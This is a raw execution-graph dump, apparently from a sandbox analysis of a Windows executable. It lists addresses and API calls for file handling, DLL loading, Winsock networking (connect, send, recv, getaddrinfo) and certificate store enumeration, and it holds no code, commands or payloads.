                                                                                                                                                                                                                              execution_graph 40554 7ffedd2762b4 40555 7ffedd276305 40554->40555 40557 7ffedd276313 40555->40557 40558 7ffedd276208 40555->40558 40559 7ffedd276215 40558->40559 40560 7ffedd276211 40558->40560 40562 7ffedd27514c 40559->40562 40560->40557 40565 7ffedd275183 40562->40565 40564 7ffedd2751ab 40564->40560 40565->40564 40566 7ffedd2751f3 WSAGetLastError 40565->40566 40567 7ffedd2751fb WSAGetLastError 40565->40567 40568 7ffedd275260 WSAGetLastError 40565->40568 40569 7ffedd275268 WSAGetLastError 40565->40569 40570 7ffedd275288 WSAGetLastError 40565->40570 40574 7ffedd276854 40565->40574 40577 7ffedd276268 40565->40577 40580 7ffedd274550 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind select 40565->40580 40566->40567 40567->40564 40567->40565 40568->40569 40569->40565 40570->40565 40571 7ffedd27529d WSAGetLastError 40570->40571 40571->40564 40571->40565 40575 7ffedd276869 40574->40575 40576 7ffedd276876 send 40574->40576 40575->40576 40576->40565 40578 7ffedd27627d 40577->40578 40579 7ffedd27628a recv 40577->40579 40578->40579 40579->40565 40580->40565 40581 7ffedd2752f4 40582 7ffedd275349 40581->40582 40583 7ffedd27530b 40581->40583 40584 7ffedd27531e closesocket 40583->40584 40585 7ffedd275335 40584->40585 40585->40582 40586 7ffedd27533e 00007FFEFBBC3440 40585->40586 40586->40582 40587 7ff79a325698 40588 7ff79a3256cf 40587->40588 40589 7ff79a3256b2 40587->40589 40588->40589 40590 7ff79a3256e2 CreateFileW 40588->40590 40612 7ff79a324f58 11 API calls _get_daylight 40589->40612 40593 7ff79a32574c 40590->40593 40594 7ff79a325716 40590->40594 40592 7ff79a3256b7 40613 7ff79a324f78 11 API calls _get_daylight 40592->40613 40616 7ff79a325c74 46 API calls 3 library calls 40593->40616 40615 7ff79a3257ec 59 API calls 3 library calls 40594->40615 40598 7ff79a3256bf 40614 7ff79a32a950 37 API calls _invalid_parameter_noinfo 40598->40614 40599 7ff79a325724 40602 7ff79a32572b CloseHandle 40599->40602 40603 7ff79a325741 CloseHandle 40599->40603 40600 7ff79a325751 40604 7ff79a325780 40600->40604 40605 7ff79a325755 40600->40605 40607 7ff79a3256ca 40602->40607 40603->40607 40618 7ff79a325a34 51 API calls 40604->40618 40617 7ff79a324eec 11 API calls 2 library calls 40605->40617 40609 7ff79a32578d 40619 7ff79a325b70 21 API calls _fread_nolock 40609->40619 40611 7ff79a32575f 40611->40607 40612->40592 40613->40598 40614->40607 40615->40599 40616->40600 40617->40611 40618->40609 40619->40611 40620 7ffedd2cd637 40621 7ffedd2cd671 40620->40621 40623 7ffedd2cd65c 40620->40623 40621->40623 40624 7ffedd2b44f0 40621->40624 40625 7ffedd2b4510 40624->40625 40626 7ffedd2b459c 40625->40626 40628 7ffedd2b06a0 40625->40628 40626->40623 40629 7ffedd2b0722 40628->40629 40630 7ffedd2b06c2 40628->40630 40632 7ffedd2a90d0 40629->40632 40630->40625 40633 7ffedd2a90f2 40632->40633 40634 7ffedd2a9125 40632->40634 40633->40630 40634->40633 40636 7ffedd2a92be 40634->40636 40638 7ffedd2a92d4 40634->40638 40635 7ffedd2a932b 00007FFEF5CE19C0 40635->40633 40639 7ffedd2a6d90 40636->40639 40638->40633 40638->40635 40640 7ffedd2a6dbf 40639->40640 40641 7ffedd2a6ddc 40640->40641 40643 7ffedd29c960 40640->40643 40641->40633 40647 7ffedd29c98d 40643->40647 40644 7ffedd29ca04 ReadFile 40645 7ffedd29ca9a 40644->40645 40644->40647 40646 7ffedd29cad9 00007FFEF5CE19C0 40645->40646 40648 7ffedd29c9a4 40645->40648 40646->40648 40647->40644 40647->40645 40647->40648 40648->40641 40649 7ffedd27507c 40656 7ffedd273d80 40649->40656 40652 7ffedd2750bc 40654 7ffedd2750ec bind 40652->40654 40655 7ffedd27510e 40652->40655 40653 7ffedd27513a 40654->40655 40674 7ffedd272a50 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 40655->40674 40657 7ffedd273db3 40656->40657 40661 7ffedd274092 40656->40661 40658 7ffedd273dbc 40657->40658 40659 7ffedd273f8d 40657->40659 40660 7ffedd273f16 40658->40660 40666 7ffedd273dc5 40658->40666 40662 7ffedd273dca 40659->40662 40676 7ffedd274c10 8 API calls 40659->40676 40660->40662 40675 7ffedd274b24 00007FFEFBBD4340 40660->40675 40661->40662 40677 7ffedd274c10 8 API calls 40661->40677 40662->40652 40666->40662 40670 7ffedd273ea8 UuidFromStringW 40666->40670 40667 7ffedd27417c htons 40667->40662 40668 7ffedd274149 40668->40662 40668->40667 40669 7ffedd274016 40669->40662 40671 7ffedd274063 htons htonl 40669->40671 40672 7ffedd273ec0 40670->40672 40671->40662 40672->40662 40673 7ffedd273eeb UuidFromStringW 40672->40673 40673->40662 40674->40653 40675->40662 40676->40669 40677->40668 40678 7ff79a312fe0 40679 7ff79a312ff0 40678->40679 40680 7ff79a31302b 40679->40680 40681 7ff79a313041 40679->40681 40740 7ff79a312710 54 API calls _log10_special 40680->40740 40683 7ff79a313061 40681->40683 40694 7ff79a313077 __vcrt_freefls 40681->40694 40741 7ff79a312710 54 API calls _log10_special 40683->40741 40686 7ff79a313037 __vcrt_freefls 40742 7ff79a31c5c0 40686->40742 40689 7ff79a313349 40757 7ff79a312710 54 API calls _log10_special 40689->40757 40692 7ff79a313333 40756 7ff79a312710 54 API calls _log10_special 40692->40756 40694->40686 40694->40689 40694->40692 40695 7ff79a31330d 40694->40695 40697 7ff79a313207 40694->40697 40706 7ff79a311470 40694->40706 40736 7ff79a311c80 40694->40736 40755 7ff79a312710 54 API calls _log10_special 40695->40755 40698 7ff79a313273 40697->40698 40751 7ff79a32a474 37 API calls 2 library calls 40697->40751 40700 7ff79a31329e 40698->40700 40701 7ff79a313290 40698->40701 40753 7ff79a312dd0 37 API calls 40700->40753 40752 7ff79a32a474 37 API calls 2 library calls 40701->40752 40704 7ff79a31329c 40754 7ff79a312500 54 API calls __vcrt_freefls 40704->40754 40758 7ff79a3145b0 40706->40758 40709 7ff79a31149b 40798 7ff79a312710 54 API calls _log10_special 40709->40798 40710 7ff79a3114bc 40768 7ff79a320744 40710->40768 40713 7ff79a3114ab 40713->40694 40714 7ff79a3114d1 40715 7ff79a3114f8 40714->40715 40716 7ff79a3114d5 40714->40716 40720 7ff79a311508 40715->40720 40721 7ff79a311532 40715->40721 40799 7ff79a324f78 11 API calls _get_daylight 40716->40799 40718 7ff79a3114da 40800 7ff79a312910 54 API calls _log10_special 40718->40800 40801 7ff79a324f78 11 API calls _get_daylight 40720->40801 40722 7ff79a311538 40721->40722 40731 7ff79a31154b 40721->40731 40772 7ff79a311210 40722->40772 40723 7ff79a3114f3 __vcrt_freefls 40794 7ff79a3200bc 40723->40794 40726 7ff79a311510 40802 7ff79a312910 54 API calls _log10_special 40726->40802 40729 7ff79a3115c4 40729->40694 40731->40723 40732 7ff79a3115d6 40731->40732 40803 7ff79a32040c 40731->40803 40806 7ff79a324f78 11 API calls _get_daylight 40732->40806 40734 7ff79a3115db 40807 7ff79a312910 54 API calls _log10_special 40734->40807 40737 7ff79a311ca5 40736->40737 41048 7ff79a3249f4 40737->41048 40740->40686 40741->40686 40743 7ff79a31c5c9 40742->40743 40744 7ff79a3131fa 40743->40744 40745 7ff79a31c950 IsProcessorFeaturePresent 40743->40745 40746 7ff79a31c968 40745->40746 41075 7ff79a31cb48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 40746->41075 40748 7ff79a31c97b 41076 7ff79a31c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 40748->41076 40751->40698 40752->40704 40753->40704 40754->40686 40755->40686 40756->40686 40757->40686 40759 7ff79a3145bc 40758->40759 40808 7ff79a319400 40759->40808 40761 7ff79a3145e4 40762 7ff79a319400 2 API calls 40761->40762 40763 7ff79a3145f7 40762->40763 40813 7ff79a326004 40763->40813 40766 7ff79a31c5c0 _log10_special 8 API calls 40767 7ff79a311493 40766->40767 40767->40709 40767->40710 40769 7ff79a320774 40768->40769 40981 7ff79a3204d4 40769->40981 40771 7ff79a32078d 40771->40714 40773 7ff79a311268 40772->40773 40774 7ff79a311297 40773->40774 40775 7ff79a31126f 40773->40775 40778 7ff79a3112b1 40774->40778 40779 7ff79a3112d4 40774->40779 40998 7ff79a312710 54 API calls _log10_special 40775->40998 40777 7ff79a311282 40777->40723 40999 7ff79a324f78 11 API calls _get_daylight 40778->40999 40783 7ff79a3112e6 40779->40783 40792 7ff79a311309 memcpy_s 40779->40792 40781 7ff79a3112b6 41000 7ff79a312910 54 API calls _log10_special 40781->41000 41001 7ff79a324f78 11 API calls _get_daylight 40783->41001 40785 7ff79a3112eb 41002 7ff79a312910 54 API calls _log10_special 40785->41002 40786 7ff79a32040c _fread_nolock 53 API calls 40786->40792 40788 7ff79a3112cf __vcrt_freefls 40788->40723 40789 7ff79a3113cf 41003 7ff79a312710 54 API calls _log10_special 40789->41003 40792->40786 40792->40788 40792->40789 40793 7ff79a320180 37 API calls 40792->40793 40994 7ff79a320b4c 40792->40994 40793->40792 40795 7ff79a3200ec 40794->40795 41020 7ff79a31fe98 40795->41020 40797 7ff79a320105 40797->40729 40798->40713 40799->40718 40800->40723 40801->40726 40802->40723 41032 7ff79a32042c 40803->41032 40806->40734 40807->40723 40809 7ff79a319422 MultiByteToWideChar 40808->40809 40810 7ff79a319446 40808->40810 40809->40810 40812 7ff79a31945c __vcrt_freefls 40809->40812 40811 7ff79a319463 MultiByteToWideChar 40810->40811 40810->40812 40811->40812 40812->40761 40814 7ff79a325f38 40813->40814 40815 7ff79a325f5e 40814->40815 40817 7ff79a325f91 40814->40817 40844 7ff79a324f78 11 API calls _get_daylight 40815->40844 40819 7ff79a325f97 40817->40819 40820 7ff79a325fa4 40817->40820 40818 7ff79a325f63 40845 7ff79a32a950 37 API calls _invalid_parameter_noinfo 40818->40845 40846 7ff79a324f78 11 API calls _get_daylight 40819->40846 40832 7ff79a32ac98 40820->40832 40824 7ff79a314606 40824->40766 40826 7ff79a325fb8 40847 7ff79a324f78 11 API calls _get_daylight 40826->40847 40827 7ff79a325fc5 40839 7ff79a32ff3c 40827->40839 40830 7ff79a325fd8 40848 7ff79a3254e8 LeaveCriticalSection 40830->40848 40849 7ff79a330348 EnterCriticalSection 40832->40849 40834 7ff79a32acaf 40835 7ff79a32ad0c 19 API calls 40834->40835 40836 7ff79a32acba 40835->40836 40837 7ff79a3303a8 _isindst LeaveCriticalSection 40836->40837 40838 7ff79a325fae 40837->40838 40838->40826 40838->40827 40850 7ff79a32fc38 40839->40850 40843 7ff79a32ff96 40843->40830 40844->40818 40845->40824 40846->40824 40847->40824 40855 7ff79a32fc73 __vcrt_FlsAlloc 40850->40855 40852 7ff79a32ff11 40869 7ff79a32a950 37 API calls _invalid_parameter_noinfo 40852->40869 40854 7ff79a32fe43 40854->40843 40862 7ff79a336dc4 40854->40862 40860 7ff79a32fe3a 40855->40860 40865 7ff79a327aac 51 API calls 3 library calls 40855->40865 40857 7ff79a32fea5 40857->40860 40866 7ff79a327aac 51 API calls 3 library calls 40857->40866 40859 7ff79a32fec4 40859->40860 40867 7ff79a327aac 51 API calls 3 library calls 40859->40867 40860->40854 40868 7ff79a324f78 11 API calls _get_daylight 40860->40868 40870 7ff79a3363c4 40862->40870 40865->40857 40866->40859 40867->40860 40868->40852 40869->40854 40871 7ff79a3363f9 40870->40871 40872 7ff79a3363db 40870->40872 40871->40872 40874 7ff79a336415 40871->40874 40924 7ff79a324f78 11 API calls _get_daylight 40872->40924 40881 7ff79a3369d4 40874->40881 40875 7ff79a3363e0 40925 7ff79a32a950 37 API calls _invalid_parameter_noinfo 40875->40925 40879 7ff79a3363ec 40879->40843 40927 7ff79a336708 40881->40927 40884 7ff79a336a49 40959 7ff79a324f58 11 API calls _get_daylight 40884->40959 40885 7ff79a336a61 40947 7ff79a328590 40885->40947 40894 7ff79a336440 40894->40879 40926 7ff79a328568 LeaveCriticalSection 40894->40926 40905 7ff79a336a4e 40960 7ff79a324f78 11 API calls _get_daylight 40905->40960 40924->40875 40925->40879 40928 7ff79a336734 40927->40928 40935 7ff79a33674e 40927->40935 40928->40935 40972 7ff79a324f78 11 API calls _get_daylight 40928->40972 40930 7ff79a336743 40973 7ff79a32a950 37 API calls _invalid_parameter_noinfo 40930->40973 40932 7ff79a33681d 40943 7ff79a33687a 40932->40943 40978 7ff79a329be8 37 API calls 2 library calls 40932->40978 40933 7ff79a3367cc 40933->40932 40976 7ff79a324f78 11 API calls _get_daylight 40933->40976 40935->40933 40974 7ff79a324f78 11 API calls _get_daylight 40935->40974 40937 7ff79a336876 40940 7ff79a3368f8 40937->40940 40937->40943 40939 7ff79a336812 40977 7ff79a32a950 37 API calls _invalid_parameter_noinfo 40939->40977 40979 7ff79a32a970 17 API calls _isindst 40940->40979 40941 7ff79a3367c1 40975 7ff79a32a950 37 API calls _invalid_parameter_noinfo 40941->40975 40943->40884 40943->40885 40980 7ff79a330348 EnterCriticalSection 40947->40980 40959->40905 40960->40894 40972->40930 40973->40935 40974->40941 40975->40933 40976->40939 40977->40932 40978->40937 40982 7ff79a32053e 40981->40982 40983 7ff79a3204fe 40981->40983 40982->40983 40985 7ff79a32054a 40982->40985 40993 7ff79a32a884 37 API calls 2 library calls 40983->40993 40992 7ff79a3254dc EnterCriticalSection 40985->40992 40986 7ff79a320525 40986->40771 40988 7ff79a32054f 40989 7ff79a320658 71 API calls 40988->40989 40990 7ff79a320561 40989->40990 40991 7ff79a3254e8 _fread_nolock LeaveCriticalSection 40990->40991 40991->40986 40993->40986 40995 7ff79a320b7c 40994->40995 41004 7ff79a32089c 40995->41004 40997 7ff79a320b9a 40997->40792 40998->40777 40999->40781 41000->40788 41001->40785 41002->40788 41003->40788 41005 7ff79a3208bc 41004->41005 41010 7ff79a3208e9 41004->41010 41006 7ff79a3208f1 41005->41006 41007 7ff79a3208c6 41005->41007 41005->41010 41011 7ff79a3207dc 41006->41011 41018 7ff79a32a884 37 API calls 2 library calls 41007->41018 41010->40997 41019 7ff79a3254dc EnterCriticalSection 41011->41019 41013 7ff79a3207f9 41014 7ff79a32081c 74 API calls 41013->41014 41015 7ff79a320802 41014->41015 41016 7ff79a3254e8 _fread_nolock LeaveCriticalSection 41015->41016 41017 7ff79a32080d 41016->41017 41017->41010 41018->41010 41021 7ff79a31fee1 41020->41021 41022 7ff79a31feb3 41020->41022 41029 7ff79a31fed3 41021->41029 41030 7ff79a3254dc EnterCriticalSection 41021->41030 41031 7ff79a32a884 37 API calls 2 library calls 41022->41031 41025 7ff79a31fef8 41026 7ff79a31ff14 72 API calls 41025->41026 41027 7ff79a31ff04 41026->41027 41028 7ff79a3254e8 _fread_nolock LeaveCriticalSection 41027->41028 41028->41029 41029->40797 41031->41029 41033 7ff79a320456 41032->41033 41044 7ff79a320424 41032->41044 41034 7ff79a3204a2 41033->41034 41035 7ff79a320465 __scrt_get_show_window_mode 41033->41035 41033->41044 41045 7ff79a3254dc EnterCriticalSection 41034->41045 41046 7ff79a324f78 11 API calls _get_daylight 41035->41046 41037 7ff79a3204aa 41039 7ff79a3201ac _fread_nolock 51 API calls 41037->41039 41041 7ff79a3204c1 41039->41041 41040 7ff79a32047a 41047 7ff79a32a950 37 API calls _invalid_parameter_noinfo 41040->41047 41043 7ff79a3254e8 _fread_nolock LeaveCriticalSection 41041->41043 41043->41044 41044->40731 41046->41040 41047->41044 41050 7ff79a324a4e 41048->41050 41049 7ff79a324a73 41066 7ff79a32a884 37 API calls 2 library calls 41049->41066 41050->41049 41052 7ff79a324aaf 41050->41052 41067 7ff79a322c80 49 API calls _invalid_parameter_noinfo 41052->41067 41054 7ff79a324b8c 41057 7ff79a32a9b8 __free_lconv_mon 11 API calls 41054->41057 41055 7ff79a324b46 41055->41054 41059 7ff79a324bb0 41055->41059 41060 7ff79a324b61 41055->41060 41063 7ff79a324b58 41055->41063 41056 7ff79a31c5c0 _log10_special 8 API calls 41058 7ff79a311cc8 41056->41058 41065 7ff79a324a9d 41057->41065 41058->40694 41059->41054 41061 7ff79a324bba 41059->41061 41068 7ff79a32a9b8 41060->41068 41064 7ff79a32a9b8 __free_lconv_mon 11 API calls 41061->41064 41063->41054 41063->41060 41064->41065 41065->41056 41066->41065 41067->41055 41069 7ff79a32a9bd RtlFreeHeap 41068->41069 41073 7ff79a32a9ec 41068->41073 41070 7ff79a32a9d8 GetLastError 41069->41070 41069->41073 41071 7ff79a32a9e5 __free_lconv_mon 41070->41071 41074 7ff79a324f78 11 API calls _get_daylight 41071->41074 41073->41065 41074->41073 41075->40748 41077 7ffedd23a320 41078 7ffedd23a333 41077->41078 41079 7ffedd23a392 41078->41079 41081 7ffedd23a404 00007FFEDDCAD2CC 41078->41081 41082 7ffedd23a43a 41081->41082 41089 7ffedd23a46c 41081->41089 41094 7ffedd23c500 CertOpenStore 41082->41094 41084 7ffedd23a44a 41086 7ffedd23a45e GetLastError 41084->41086 41084->41089 41085 7ffedd23a53c CertEnumCertificatesInStore 41091 7ffedd23a442 41085->41091 41093 7ffedd23a551 41085->41093 41086->41089 41087 7ffedd23a64c CertCloseStore 41087->41084 41087->41089 41088 7ffedd23a556 41090 7ffedd23a5dd CertFreeCertificateContext 41088->41090 41089->41079 41090->41093 41091->41084 41091->41085 41091->41088 41092 7ffedd23be04 CertGetEnhancedKeyUsage CertGetEnhancedKeyUsage GetLastError 41091->41092 41092->41091 41093->41087 41095 7ffedd23c53a 41094->41095 41098 7ffedd23c53e 41094->41098 41095->41091 41096 7ffedd23c542 CertOpenStore 41097 7ffedd23c56d CertAddStoreToCollection 41096->41097 41096->41098 41097->41098 41099 7ffedd23c587 CertCloseStore 41097->41099 41098->41096 41098->41099 41100 7ffedd23c59c 41098->41100 41099->41098 41100->41095 41101 7ffedd23c5a1 CertCloseStore 41100->41101 41101->41095 41102 7ffedd275360 41103 7ffedd273d80 14 API calls 41102->41103 41106 7ffedd2753a0 41103->41106 41104 7ffedd2753da 41123 7ffedd272a50 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 41104->41123 41106->41104 41109 7ffedd274434 41106->41109 41107 7ffedd2753f9 41110 7ffedd279548 41109->41110 41111 7ffedd274458 connect 41110->41111 41112 7ffedd274476 41111->41112 41113 7ffedd27447e WSAGetLastError WSAGetLastError 41112->41113 41122 7ffedd2744dd 41112->41122 41114 7ffedd274497 41113->41114 41115 7ffedd2744e4 41114->41115 41116 7ffedd2744cd 41114->41116 41114->41122 41118 7ffedd2744ff 41115->41118 41119 7ffedd274518 41115->41119 41117 7ffedd2744d2 WSASetLastError 41116->41117 41116->41122 41117->41122 41120 7ffedd27514c 13 API calls 41118->41120 41121 7ffedd27514c 13 API calls 41119->41121 41120->41122 41121->41122 41122->41104 41123->41107 41124 7ffedd271220 WSAStartup 41125 7ffedd271266 00007FFEDDCCF380 41124->41125 41126 7ffedd2728c5 41124->41126 41129 7ffedd271299 41125->41129 41132 7ffedd272a50 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 41126->41132 41128 7ffedd2728e0 41129->41126 41131 7ffedd271060 8 API calls 41129->41131 41131->41126 41132->41128 41133 7ffedd2768a0 41135 7ffedd2768e8 41133->41135 41134 7ffedd27514c 13 API calls 41134->41135 41135->41134 41136 7ffedd2768ec 41135->41136 41137 7ffedd2770e0 41139 7ffedd277182 41137->41139 41138 7ffedd2773ff 41139->41138 41141 7ffedd2772b9 getaddrinfo 41139->41141 41142 7ffedd2772e1 41139->41142 41140 7ffedd277483 FreeAddrInfoW 41140->41138 41146 7ffedd2772dc 41141->41146 41142->41138 41142->41140 41144 7ffedd2773f9 FreeAddrInfoW 41144->41138 41145 7ffedd2773be 41145->41138 41145->41144 41146->41142 41146->41145 41147 7ffedd27481c 13 API calls 41146->41147 41147->41146 41148 7ff79a31ccac 41169 7ff79a31ce7c 41148->41169 41151 7ff79a31cdf8 41318 7ff79a31d19c 7 API calls 2 library calls 41151->41318 41152 7ff79a31ccc8 __scrt_acquire_startup_lock 41154 7ff79a31ce02 41152->41154 41161 7ff79a31cce6 __scrt_release_startup_lock 41152->41161 41319 7ff79a31d19c 7 API calls 2 library calls 41154->41319 41156 7ff79a31cd0b 41157 7ff79a31ce0d __GetCurrentState 41158 7ff79a31cd91 41175 7ff79a31d2e4 41158->41175 41160 7ff79a31cd96 41178 7ff79a311000 41160->41178 41161->41156 41161->41158 41315 7ff79a329b9c 45 API calls 41161->41315 41166 7ff79a31cdb9 41166->41157 41317 7ff79a31d000 7 API calls 41166->41317 41168 7ff79a31cdd0 41168->41156 41170 7ff79a31ce84 41169->41170 41171 7ff79a31ce90 __scrt_dllmain_crt_thread_attach 41170->41171 41172 7ff79a31ce9d 41171->41172 41174 7ff79a31ccc0 41171->41174 41172->41174 41320 7ff79a31d8f8 7 API calls 2 library calls 41172->41320 41174->41151 41174->41152 41321 7ff79a33a540 41175->41321 41177 7ff79a31d2fb GetStartupInfoW 41177->41160 41179 7ff79a311009 41178->41179 41323 7ff79a3254f4 41179->41323 41181 7ff79a3137fb 41330 7ff79a3136b0 41181->41330 41184 7ff79a313808 __vcrt_freefls 41186 7ff79a31c5c0 _log10_special 8 API calls 41184->41186 41190 7ff79a313ca7 41186->41190 41188 7ff79a31391b 41192 7ff79a3145b0 108 API calls 41188->41192 41189 7ff79a31383c 41191 7ff79a311c80 49 API calls 41189->41191 41316 7ff79a31d328 GetModuleHandleW 41190->41316 41193 7ff79a31385b 41191->41193 41194 7ff79a31392b 41192->41194 41402 7ff79a318a20 41193->41402 41196 7ff79a31396a 41194->41196 41425 7ff79a317f80 41194->41425 41434 7ff79a312710 54 API calls _log10_special 41196->41434 41198 7ff79a31388e 41207 7ff79a3138bb __vcrt_freefls 41198->41207 41424 7ff79a318b90 40 API calls __vcrt_freefls 41198->41424 41200 7ff79a31395d 41201 7ff79a313962 41200->41201 41202 7ff79a313984 41200->41202 41205 7ff79a3200bc 74 API calls 41201->41205 41203 7ff79a311c80 49 API calls 41202->41203 41206 7ff79a3139a3 41203->41206 41205->41196 41212 7ff79a311950 115 API calls 41206->41212 41208 7ff79a318a20 14 API calls 41207->41208 41215 7ff79a3138de __vcrt_freefls 41207->41215 41208->41215 41210 7ff79a313a0b 41437 7ff79a318b90 40 API calls __vcrt_freefls 41210->41437 41214 7ff79a3139ce 41212->41214 41213 7ff79a313a17 41438 7ff79a318b90 40 API calls __vcrt_freefls 41213->41438 41214->41193 41217 7ff79a3139de 41214->41217 41221 7ff79a31390e __vcrt_freefls 41215->41221 41436 7ff79a318b30 40 API calls __vcrt_freefls 41215->41436 41435 7ff79a312710 54 API calls _log10_special 41217->41435 41218 7ff79a313a23 41439 7ff79a318b90 40 API calls __vcrt_freefls 41218->41439 41222 7ff79a318a20 14 API calls 41221->41222 41223 7ff79a313a3b 41222->41223 41224 7ff79a313b2f 41223->41224 41225 7ff79a313a60 __vcrt_freefls 41223->41225 41441 7ff79a312710 54 API calls _log10_special 41224->41441 41233 7ff79a313aab 41225->41233 41440 7ff79a318b30 40 API calls __vcrt_freefls 41225->41440 41228 7ff79a318a20 14 API calls 41229 7ff79a313bf4 __vcrt_freefls 41228->41229 41230 7ff79a313d41 41229->41230 41231 7ff79a313c46 41229->41231 41446 7ff79a3144d0 49 API calls 41230->41446 41234 7ff79a313c50 41231->41234 41235 7ff79a313cd4 41231->41235 41233->41228 41442 7ff79a3190e0 59 API calls _log10_special 41234->41442 41236 7ff79a318a20 14 API calls 41235->41236 41240 7ff79a313ce0 41236->41240 41237 7ff79a313d4f 41241 7ff79a313d71 41237->41241 41242 7ff79a313d65 41237->41242 41239 7ff79a313c55 41243 7ff79a313c61 41239->41243 41244 7ff79a313cb3 41239->41244 41240->41243 41247 7ff79a313ced 41240->41247 41246 7ff79a311c80 49 API calls 41241->41246 41447 7ff79a314620 41242->41447 41443 7ff79a312710 54 API calls _log10_special 41243->41443 41444 7ff79a318850 86 API calls 2 library calls 41244->41444 41257 7ff79a313d2b __vcrt_freefls 41246->41257 41250 7ff79a311c80 49 API calls 41247->41250 41253 7ff79a313d0b 41250->41253 41251 7ff79a313dc4 41254 7ff79a319400 2 API calls 41251->41254 41252 7ff79a313cbb 41255 7ff79a313cc8 41252->41255 41256 7ff79a313cbf 41252->41256 41253->41257 41258 7ff79a313d12 41253->41258 41260 7ff79a313dd7 SetDllDirectoryW 41254->41260 41255->41257 41256->41243 41257->41251 41259 7ff79a313da7 SetDllDirectoryW LoadLibraryExW 41257->41259 41445 7ff79a312710 54 API calls _log10_special 41258->41445 41259->41251 41263 7ff79a313e0a 41260->41263 41305 7ff79a313e5a 41260->41305 41264 7ff79a318a20 14 API calls 41263->41264 41273 7ff79a313e16 __vcrt_freefls 41264->41273 41265 7ff79a313ffc 41267 7ff79a314029 41265->41267 41268 7ff79a314006 PostMessageW GetMessageW 41265->41268 41266 7ff79a313f1b 41458 7ff79a3133c0 121 API calls 2 library calls 41266->41458 41415 7ff79a313360 41267->41415 41268->41267 41270 7ff79a313f23 41270->41184 41271 7ff79a313f2b 41270->41271 41459 7ff79a3190c0 LocalFree 41271->41459 41276 7ff79a313ef2 41273->41276 41280 7ff79a313e4e 41273->41280 41457 7ff79a318b30 40 API calls __vcrt_freefls 41276->41457 41280->41305 41450 7ff79a316db0 54 API calls _get_daylight 41280->41450 41283 7ff79a314043 41461 7ff79a316fb0 FreeLibrary 41283->41461 41288 7ff79a31404f 41289 7ff79a313e6c 41451 7ff79a317330 117 API calls 2 library calls 41289->41451 41293 7ff79a313e81 41296 7ff79a313ea2 41293->41296 41308 7ff79a313e85 41293->41308 41452 7ff79a316df0 120 API calls _log10_special 41293->41452 41296->41308 41453 7ff79a3171a0 125 API calls 41296->41453 41300 7ff79a313ee0 41456 7ff79a316fb0 FreeLibrary 41300->41456 41301 7ff79a313eb7 41301->41308 41454 7ff79a3174e0 55 API calls 41301->41454 41305->41265 41305->41266 41308->41305 41455 7ff79a312a50 54 API calls _log10_special 41308->41455 41315->41158 41316->41166 41317->41168 41318->41154 41319->41157 41320->41174 41322 7ff79a33a530 41321->41322 41322->41177 41322->41322 41324 7ff79a32f4f0 41323->41324 41325 7ff79a32f543 41324->41325 41327 7ff79a32f596 41324->41327 41462 7ff79a32a884 37 API calls 2 library calls 41325->41462 41463 7ff79a32f3c8 71 API calls _fread_nolock 41327->41463 41329 7ff79a32f56c 41329->41181 41464 7ff79a31c8c0 41330->41464 41333 7ff79a3136eb GetLastError 41471 7ff79a312c50 51 API calls _log10_special 41333->41471 41334 7ff79a313710 41466 7ff79a3192f0 FindFirstFileExW 41334->41466 41338 7ff79a31377d 41474 7ff79a3194b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 41338->41474 41339 7ff79a313723 41472 7ff79a319370 CreateFileW GetFinalPathNameByHandleW CloseHandle 41339->41472 41340 7ff79a31c5c0 _log10_special 8 API calls 41344 7ff79a3137b5 41340->41344 41343 7ff79a31378b 41346 7ff79a313706 41343->41346 41475 7ff79a312810 49 API calls _log10_special 41343->41475 41344->41184 41352 7ff79a311950 41344->41352 41345 7ff79a313730 41347 7ff79a31374c __vcrt_FlsAlloc 41345->41347 41348 7ff79a313734 41345->41348 41346->41340 41347->41338 41473 7ff79a312810 49 API calls _log10_special 41348->41473 41351 7ff79a313745 41351->41346 41353 7ff79a3145b0 108 API calls 41352->41353 41354 7ff79a311985 41353->41354 41355 7ff79a311c43 41354->41355 41356 7ff79a317f80 83 API calls 41354->41356 41357 7ff79a31c5c0 _log10_special 8 API calls 41355->41357 41358 7ff79a3119cb 41356->41358 41359 7ff79a311c5e 41357->41359 41360 7ff79a320744 73 API calls 41358->41360 41401 7ff79a311a03 41358->41401 41359->41188 41359->41189 41362 7ff79a3119e5 41360->41362 41361 7ff79a3200bc 74 API calls 41361->41355 41363 7ff79a311a08 41362->41363 41364 7ff79a3119e9 41362->41364 41366 7ff79a32040c _fread_nolock 53 API calls 41363->41366 41476 7ff79a324f78 11 API calls _get_daylight 41364->41476 41368 7ff79a311a20 41366->41368 41367 7ff79a3119ee 41477 7ff79a312910 54 API calls _log10_special 41367->41477 41370 7ff79a311a45 41368->41370 41371 7ff79a311a26 41368->41371 41375 7ff79a311a7b 41370->41375 41376 7ff79a311a5c 41370->41376 41478 7ff79a324f78 11 API calls _get_daylight 41371->41478 41373 7ff79a311a2b 41479 7ff79a312910 54 API calls _log10_special 41373->41479 41378 7ff79a311c80 49 API calls 41375->41378 41480 7ff79a324f78 11 API calls _get_daylight 41376->41480 41380 7ff79a311a92 41378->41380 41379 7ff79a311a61 41481 7ff79a312910 54 API calls _log10_special 41379->41481 41382 7ff79a311c80 49 API calls 41380->41382 41383 7ff79a311add 41382->41383 41384 7ff79a320744 73 API calls 41383->41384 41385 7ff79a311b01 41384->41385 41386 7ff79a311b35 41385->41386 41387 7ff79a311b16 41385->41387 41389 7ff79a32040c _fread_nolock 53 API calls 41386->41389 41482 7ff79a324f78 11 API calls _get_daylight 41387->41482 41391 7ff79a311b4a 41389->41391 41390 7ff79a311b1b 41483 7ff79a312910 54 API calls _log10_special 41390->41483 41393 7ff79a311b6f 41391->41393 41394 7ff79a311b50 41391->41394 41486 7ff79a320180 37 API calls 2 library calls 41393->41486 41484 7ff79a324f78 11 API calls _get_daylight 41394->41484 41397 7ff79a311b89 41397->41401 41487 7ff79a312710 54 API calls _log10_special 41397->41487 41398 7ff79a311b55 41485 7ff79a312910 54 API calls _log10_special 41398->41485 41401->41361 41403 7ff79a318a2a 41402->41403 41404 